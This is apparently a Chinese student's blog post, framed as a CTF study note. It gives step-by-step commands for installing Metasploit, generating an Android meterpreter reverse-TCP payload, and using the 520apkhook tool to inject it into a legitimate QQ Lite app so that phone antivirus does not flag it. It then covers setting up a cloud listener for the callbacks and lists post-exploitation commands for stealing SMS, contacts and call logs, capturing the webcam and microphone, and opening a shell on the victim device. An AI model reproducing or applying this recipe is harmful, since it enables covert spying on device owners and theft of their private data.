CTF学习笔记（大学篇）05 —— 通过msfconsole和520apkhook创建带有后门程序的安卓程序

2138 字

11 分钟

CTF学习笔记（大学篇）05 —— 通过msfconsole和520apkhook创建带有后门程序的安卓程序

2022-06-07

CTF

/

Virus

/

msfconsole

/

msfvenom

/

apk

本文所用项目链接

ba0gu0/520apkhook: 把msf生成的安卓远控附加进普通的app中，并进行加固隐藏特征。可以绕过常见的手机安全管家。 (github.com)

在Ubuntu安装Msfvenom#

本来我想着能不能通过apt安装的，毕竟也是个软件包嘛（Kali就带了），然后我尝试运行

1
sudo apt install msfvenom -y

结果告诉我找不到，只好求助于万能的Bing

首先我们需要把下面的这些内容保存到一个文件中（文件名随意）

1
#!/bin/sh
2

3
print_pgp_key() {
4
  cat <<-EOF
5
-----BEGIN PGP PUBLIC KEY BLOCK-----
6

7
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
54
2vTa24LE0J2DQg==
55
=Qa/n
56
-----END PGP PUBLIC KEY BLOCK-----
57
EOF
58
}
59

60
install_deb() {
61
  LIST_FILE=/etc/apt/sources.list.d/metasploit-framework.list
62
  PREF_FILE=/etc/apt/preferences.d/pin-metasploit.pref
63
  echo -n "Adding metasploit-framework to your repository list.."
64
  echo "deb $DOWNLOAD_URI/apt lucid main" > $LIST_FILE
65
  print_pgp_key | apt-key add -
66
  if [ ! -f $PREF_FILE ]; then
67
    mkdir -p /etc/apt/preferences.d/
68
    cat > $PREF_FILE <<EOF
69
Package: metasploit*
70
Pin: origin downloads.metasploit.com
71
Pin-Priority: 1000
72
EOF
73
  fi
74
  echo -n "Updating package cache.."
75
  apt-get update > /dev/null
76
  echo "OK"
77
  echo "Checking for and installing update.."
78
  apt-get install -y --allow-downgrades metasploit-framework
79
}
80

81
install_rpm() {
82
  echo "Checking for and installing update.."
83
  REPO_FILE=/etc/yum.repos.d/metasploit-framework.repo
84
  GPG_KEY_FILE=/etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit
85
  echo -n "Adding metasploit-framework to your repository list.."
86

87
  cat > /etc/yum.repos.d/metasploit-framework.repo <<EOF
88
[metasploit]
89
name=Metasploit
90
baseurl=$DOWNLOAD_URI/rpm
91
gpgcheck=1
92
gpgkey=file://$GPG_KEY_FILE
93
enabled=1
94
EOF
95
  print_pgp_key > ${GPG_KEY_FILE}
96
  yum install -y metasploit-framework
97
}
98

99
install_suse() {
100
  echo "Checking for and installing update.."
101
  GPG_KEY_FILE_DIR=/etc/pki/rpm-gpg
102
  GPG_KEY_FILE=${GPG_KEY_FILE_DIR}/RPM-GPG-KEY-Metasploit
103
  echo -n "Adding metasploit-framework to your repository list.."
104
  if [ ! -d $GPG_KEY_FILE_DIR ]; then
105
    mkdir -p $GPG_KEY_FILE_DIR
106
  fi
107
  zypper ar  -f $DOWNLOAD_URI/rpm metasploit
108
  print_pgp_key > ${GPG_KEY_FILE}
109
  rpmkeys --import ${GPG_KEY_FILE}
110
  zypper install -y metasploit-framework
111
}
112

113
install_pkg()
114
{
115
  (
116
    cd ~/Downloads
117

118
    echo "Downloading package..."
119
    curl -O "$DOWNLOAD_URI/osx/metasploitframework-latest.pkg"
120

121
    echo "Checking signature..."
122

123
    if pkgutil --check-signature metasploitframework-latest.pkg; then
124
      echo "Installing package..."
125
      installer -pkg metasploitframework-latest.pkg -target /
126
    fi
127

128
    echo "Cleaning up..."
129
    rm -fv metasploitframework-latest.pkg
130
  )
131
}
132

133
DOWNLOAD_URI=http://downloads.metasploit.com/data/releases/metasploit-framework
134
PKGTYPE=unknown
135
ID=`id -u`
136

137
if [ -f /etc/redhat-release ] ; then
138
  PKGTYPE=rpm
139
elif [ -f /etc/system-release ] ; then
140
  # If /etc/system-release is present, this is likely a distro that uses RPM.
141
  PKGTYPE=rpm
142
else
143
  if uname -sv | grep 'Darwin' > /dev/null; then
144
    PKGTYPE=pkg
145
  elif [ -f /usr/bin/zypper ] ; then
146
    PKGTYPE=sus
147
  else
148
    PKGTYPE=deb
149
  fi
150
fi
151

152
if [ "$ID" -ne 0 ]; then
153
  if ! hash sudo 2>/dev/null; then
154
    echo "This script must be executed as the 'root' user or with sudo"
155
    exit 1
156
  else
157
    echo "Switching to root user to update the package"
158
    sudo -E $0 $@
159
    exit 0
160
  fi
161
fi
162

163
case $PKGTYPE in
164
  deb)
165
    install_deb
166
    ;;
167
  sus)
168
    install_suse
169
    ;;
170
  rpm)
171
    install_rpm
172
    ;;
173
  *)
174
    install_pkg
175
esac

我这里是保存为了msf文件，在运行之前一定要记得赋予执行权限

1
sudo chmod +x msf
2
sudo ./msf

然后就会开始安装，安装完成后输入msfconsole看看能不能正常打开，如果可以就是安装成功了

（附上以上正常运行的图）

用520apkhook创建带有后门的apk文件#

MSF自身本来就可以创建带有后门的APK程序，不过就是一个简单的MainActivity，我们还要把它压进我们的程序里

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=<host> LPORT=5555 R > pentestlab.apk

这个比较麻烦（有时间再补），所以我这里用Github上别人写好的脚本

这里我选用的是QQ轻聊版（name=‘com.tencent.qqlite’ versionCode=‘174’ versionName=‘3.5.0’）

首先我们要把520apkhook给clone下来才能用

1
git clone https://github.com/ba0gu0/520apkhook.git

而且用之前，我们需要安装520apkhook需要的python轮子

1
pip3 install rich pycryptodome

安装完后，我们使用下面的命令格式进行apk的后门注入

1
python3 main.py [-h] --lhost LHOST --lport LPORT [-m MODE] [-p PAYLOAD] -n NORMALAPK

我这里把QQ轻聊版命名为QQLite.apk，我的服务器地址是我的腾讯云地址，端口开在了5555，那我就可以用下面的命令生成apk

1
python3 main.py --lhost <我的腾讯云IP> --lport 5555 -n QQLite.apk

然后程序就会自动开始打包，最后会告诉我们打包完成的文件位置

然后我们安装打包好的apk，我用我的手机测试了并没有报毒（红米K40 MIUI13），不过后来我还是选择在模拟器上安装，安装完后显示为正常的QQ轻聊版，而且能够正常使用

但是并不是所有的应用都可以被注入，新版的微信就不可以（自动模式找不到入口smali）

在云服务器上创建监听器#

这个创建监听器的命令其实在520apkhook的文件夹里面已经给我们写好了，log里面有一行写道

1
[!] 生成的Msf Handler在: /home/gamernotitle/CTF/520apkhook/WorkDir/handler.rc

也就是说handler.rc文件已经为我们写好了在msfconsole里面运行的命令

我们可以通过msfconsole自带的命令加载

1
msfconsole -r handler.rc

也可以打开handler.rc并复制里面的内容

1
use exploit/multi/handler
2
set payload android/meterpreter/reverse_tcp
3
set AutoLoadStdapi true
4
set LHOST 0.0.0.0
5
set LPORT 5555
6
set exitonsession false
7
exploit -j

然后粘贴在你的msfconsole里面

这样就算是运行了，然后我们打开安装的软件，我们的msfconsole会提示肉鸡上线

这时可以用sessions命令查看在线的肉鸡

用session -i <id>就可以控制肉鸡啦

我这里就可以用session -i 1来通过第一个端口控制模拟器，使用screenshot命令进行截图

MSF session 命令列表#

我自己常用的命令

1
app_list # 列出所有的app，可以配合app_run使用
2
app_run <Package> # 运行一个APP（会在目标设备直接运行，就类似用着用着突然打开了软件）
3
webcam_list # 列出设备拥有的摄像头
4
webcam_snap -i <id> # 通过指定摄像头拍照并保存（需要摄像头权限）
5
upload <src1> <src2> ... <dst>  # 上传本地文件到指定位置
6
app_install <path> # 通过指定路径安装apk
7
check_root # 检查设备是否已经root
8
shell  # 返回一个shell会话，如果目标已经root，可以用su提权
9
dump_calllog # 储存设备的通话记录（需要读取通话记录权限）
10
dump_sms  # 储存设备的短信（需要读取短信权限）
11
dump_contacts # 储存设备的联系人列表（需要读取通讯录权限）
12
screenshare # 实时观看设备的屏幕
13
screenshot # 屏幕截图（出了寄生的软件后就截不到了）
14
record_mic # 录音
15
portfwd  # 开放端口
16
download <path> # 下载目标机器上的文件
17
ls  # 经典命令，显示当前目录下的文件（需要存储权限）

官方全命令

1
Core Commands
2
=============
3

4
    Command                   Description
5
    -------                   -----------
6
    ?                         Help menu
7
    background                Backgrounds the current session
8
    bg                        Alias for background
9
    bgkill                    Kills a background meterpreter script
10
    bglist                    Lists running background scripts
11
    bgrun                     Executes a meterpreter script as a background thread
12
    channel                   Displays information or control active channels
13
    close                     Closes a channel
14
    detach                    Detach the meterpreter session (for http/https)
15
    disable_unicode_encoding  Disables encoding of unicode strings
16
    enable_unicode_encoding   Enables encoding of unicode strings
17
    exit                      Terminate the meterpreter session
18
    get_timeouts              Get the current session timeout values
19
    guid                      Get the session GUID
20
    help                      Help menu
21
    info                      Displays information about a Post module
22
    irb                       Open an interactive Ruby shell on the current session
23
    load                      Load one or more meterpreter extensions
24
    machine_id                Get the MSF ID of the machine attached to the session
25
    pry                       Open the Pry debugger on the current session
26
    quit                      Terminate the meterpreter session
27
    read                      Reads data from a channel
28
    resource                  Run the commands stored in a file
29
    run                       Executes a meterpreter script or Post module
30
    secure                    (Re)Negotiate TLV packet encryption on the session
31
    sessions                  Quickly switch to another session
32
    set_timeouts              Set the current session timeout values
33
    sleep                     Force Meterpreter to go quiet, then re-establish session
34
    transport                 Manage the transport mechanisms
35
    use                       Deprecated alias for "load"
36
    uuid                      Get the UUID for the current session
37
    write                     Writes data to a channel
38

39

40
Stdapi: File system Commands
41
============================
42

43
    Command       Description
44
    -------       -----------
45
    cat           Read the contents of a file to the screen
46
    cd            Change directory
47
    checksum      Retrieve the checksum of a file
48
    cp            Copy source to destination
49
    del           Delete the specified file
50
    dir           List files (alias for ls)
51
    download      Download a file or directory
52
    edit          Edit a file
53
    getlwd        Print local working directory
54
    getwd         Print working directory
55
    lcat          Read the contents of a local file to the screen
56
    lcd           Change local working directory
57
    lls           List local files
58
    lpwd          Print local working directory
59
    ls            List files
60
    mkdir         Make directory
61
    mv            Move source to destination
62
    pwd           Print working directory
63
    rm            Delete the specified file
64
    rmdir         Remove directory
65
    search        Search for files
66
    upload        Upload a file or directory
67

68

69
Stdapi: Networking Commands
70
===========================
71

72
    Command       Description
73
    -------       -----------
74
    ifconfig      Display interfaces
75
    ipconfig      Display interfaces
76
    portfwd       Forward a local port to a remote service
77
    route         View and modify the routing table
78

79

80
Stdapi: System Commands
81
=======================
82

83
    Command       Description
84
    -------       -----------
85
    execute       Execute a command
86
    getenv        Get one or more environment variable values
87
    getpid        Get the current process identifier
88
    getuid        Get the user that the server is running as
89
    localtime     Displays the target system local date and time
90
    pgrep         Filter processes by name
91
    ps            List running processes
92
    shell         Drop into a system command shell
93
    sysinfo       Gets information about the remote system, such as OS
94

95

96
Stdapi: User interface Commands
97
===============================
98

99
    Command       Description
100
    -------       -----------
101
    screenshare   Watch the remote user desktop in real time
102
    screenshot    Grab a screenshot of the interactive desktop
103

104

105
Stdapi: Webcam Commands
106
=======================
107

108
    Command        Description
109
    -------        -----------
110
    record_mic     Record audio from the default microphone for X seconds
111
    webcam_chat    Start a video chat
112
    webcam_list    List webcams
113
    webcam_snap    Take a snapshot from the specified webcam
114
    webcam_stream  Play a video stream from the specified webcam
115

116

117
Stdapi: Audio Output Commands
118
=============================
119

120
    Command       Description
121
    -------       -----------
122
    play          play a waveform audio file (.wav) on the target system
123

124

125
Android Commands
126
================
127

128
    Command           Description
129
    -------           -----------
130
    activity_start    Start an Android activity from a Uri string
131
    check_root        Check if device is rooted
132
    dump_calllog      Get call log
133
    dump_contacts     Get contacts list
134
    dump_sms          Get sms messages
135
    geolocate         Get current lat-long using geolocation
136
    hide_app_icon     Hide the app icon from the launcher
137
    interval_collect  Manage interval collection capabilities
138
    send_sms          Sends SMS from target session
139
    set_audio_mode    Set Ringer Mode
140
    sqlite_query      Query a SQLite database from storage
141
    wakelock          Enable/Disable Wakelock
142
    wlan_geolocate    Get current lat-long using WLAN information
143

144

145
Application Controller Commands
146
===============================
147

148
    Command        Description
149
    -------        -----------
150
    app_install    Request to install apk file
151
    app_list       List installed apps in the device
152
    app_run        Start Main Activty for package name
153
    app_uninstall  Request to uninstall application